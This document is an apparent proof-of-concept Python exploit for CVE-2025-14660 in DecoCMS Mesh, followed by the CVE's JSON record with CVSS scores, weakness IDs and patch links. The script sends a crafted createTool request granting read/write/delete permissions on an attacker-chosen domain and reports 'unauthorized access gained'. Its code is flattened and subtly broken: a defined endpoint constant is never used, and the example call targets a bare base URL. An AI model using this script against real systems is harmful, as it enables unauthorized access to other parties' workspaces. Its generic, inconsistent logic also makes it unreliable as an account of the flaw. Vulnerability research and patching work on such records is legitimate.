CVE-2025-14660

import requests import json # CVE-2025-14660 PoC - DecoCMS Mesh Unauthorized Access via createTool # Target: DecoCMS Mesh <= 1.0.0-alpha.31 TARGET_URL = "http://target-host/api/mcp/teams/createTool" def exploit_cve_2025_14660(target_url, attacker_controlled_domain): """ Exploit improper access control in DecoCMS Mesh createTool function. Args: target_url: Base URL of the vulnerable DecoCMS Mesh instance attacker_controlled_domain: Domain that attacker controls/wants to access Returns: Response from the server """ headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-14660-PoC)" } # Malicious payload exploiting improper access control payload = { "domain": attacker_controlled_domain, "toolName": "malicious_tool", "config": { "description": "PoC for CVE-2025-14660", "permissions": ["read", "write", "delete"] } } try: response = requests.post(target_url, json=payload, headers=headers, timeout=30) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # Check if exploitation was successful if response.status_code == 200: data = response.json() if data.get("success"): print("[+] Exploitation successful - unauthorized access gained") return True print("[-] Exploitation may have failed") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": # Example usage target = "http://vulnerable-site.com" malicious_domain = "victim-workspace.decocms.local" exploit_cve_2025_14660(target, malicious_domain)

{"cve": {"id": "CVE-2025-14660", "sourceIdentifier": "[email protected]", "published": "2025-12-14T13:15:35.963", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in DecoCMS Mesh up to 1.0.0-alpha.31. Affected by this vulnerability is the function createTool of the file packages/sdk/src/mcp/teams/api.ts of the component Workspace Domain Handler. This manipulation of the argument domain causes improper access controls. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been published and may be used. Upgrading to version 1.0.0-alpha.32 addresses this issue. Patch name: 5f7315e05852faf3a9c177c0a34f9ea9b0371d3d. It is recommended to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/decocms/mesh/commit/5f7315e05852faf3a9c177c0a34f9ea9b0371d3d", "source": "[email protected]"}, {"url": "https://github.com/decocms/mesh/pull/1967", "source": "[email protected]"}, {"url": "https://github.com/decocms/mesh/pull/1967#issue-3700934099", "source": "[email protected]"}, {"url": "https://github.com/decocms/mesh/pull/1967#issuecomment-3622379237", "source": "[email protected]"}, {"url": "https://github.com/decocms/mesh/releases/tag/runtime-v1.0.0-alpha.32", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336392", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336392", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.713741", "source": "[email protected]"}]}}